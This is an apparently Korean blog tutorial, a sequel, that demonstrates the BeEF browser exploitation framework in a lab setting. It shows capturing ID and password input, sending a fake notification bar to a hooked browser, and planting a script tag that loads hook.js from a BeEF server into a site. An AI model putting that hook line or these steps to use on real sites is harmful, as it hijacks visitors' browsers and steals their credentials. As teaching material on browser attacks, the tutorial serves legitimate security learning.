[실천편] 녀석은 터무니없는 것을 훔쳐 갔습니다 ... 당신의 정보입니다. with BeEF

지난번 의 계속입니다.
이번에는 BeEF의 기능을 약간 간결하게 소개합니다.

【ID,Password 추출】



"here"링크를 클릭합니다.


링크 대상 사이트에서 "Order Your BeEF-Hamper"를 클릭합니다.


적절한 문자를 입력하고 Buy buy! 버튼을 클릭합니다.


BeEF 관리 사이트의 탭으로 이동하여 Logs 탭을 열면
  방금 입력한 정보가 상세하게 실려 있는 것을 알 수 있습니다.


【브라우저에의 커맨드 실행】



「Current Browser」→「Commands」→「Fake Notification Bar」
 를 클릭하고 마지막으로 "Execute"버튼을 클릭합니다.


"The Butcher"탭으로 이동하면 팝업이 나타납니다.


【자작 사이트에 BeEF 적용】


<script src="http://192.168.33.10:3000/hook.js"></script>자작 사이트에 추가하면 BeEF가 적용됩니다.
HOW TO USE BEEF – QUICK TUTORIAL

【참고 사이트·서적】



BeEF 홈페이지
BeEF 설치
브라우저 해킹
  

좋은 웹페이지 즐겨찾기